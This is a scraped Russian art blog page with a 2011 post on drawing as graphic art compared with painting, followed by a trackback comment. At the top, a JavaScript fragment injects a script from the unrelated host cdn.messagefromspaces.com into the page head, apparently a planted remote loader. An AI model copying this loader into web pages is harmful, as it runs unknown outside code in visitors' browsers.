, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Графика рисунка

Автор: Юлия | 12 Янв 2011

Графика рисунка

Яркость изобразительной иллюзии, создаваемой средствами живописи, резко контрастирует со строгостью и лаконичностью графики рисунка.

Рисунок – базовый элемент всего изобразительного искусства, его проявления можно увидеть уже в наскальных изображениях. Но что лежит в основе графики рисунка?

Если в живописи главным является цвет, то графика рисунка в качестве выразительных средств использует линии, штрихи, пятна, точки.

К примеру, сравним два изображения с идентичным сюжетом, одно из которых выполнено в цвете, а другое – карандашом.

По представленным работам можно заметить, что важную роль в графике рисунка играет также фон (белая или цветная бумага), который создает контраст и пространство вокруг изображаемого предмета.

Казалось бы, имея в своем распоряжении бесконечную палитру оттенков и цветовых переходов, живописи нет равных в изображении действительности. Но графика рисунка настолько точно передает мельчайшие детали, фактуру, игру света, что не уступает живописи в выразительности художественного повествования.

Глядя на два таких разных изображения, мы видим два способа восприятия мира. Не важно, какой из этих способов выберет художник для самовыражения. Главное, что и живопись, и графика великолепно справляются с задачей смыслового отражения реальности.

Темы: Изобразительное искусство | 1 отзыв »

Один отзыв на “Графика рисунка”

  1. Tweets that mention Графика рисунка | Лаборатория Искусства -- Topsy.com пишет:
    28 Янв 2011 в 20:50

    [...] This post was mentioned on Twitter by Алексей, Иван Михо. Иван Михо said: RT @almazov82on Графика рисунка http://bit.ly/hxtnpM [...]

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress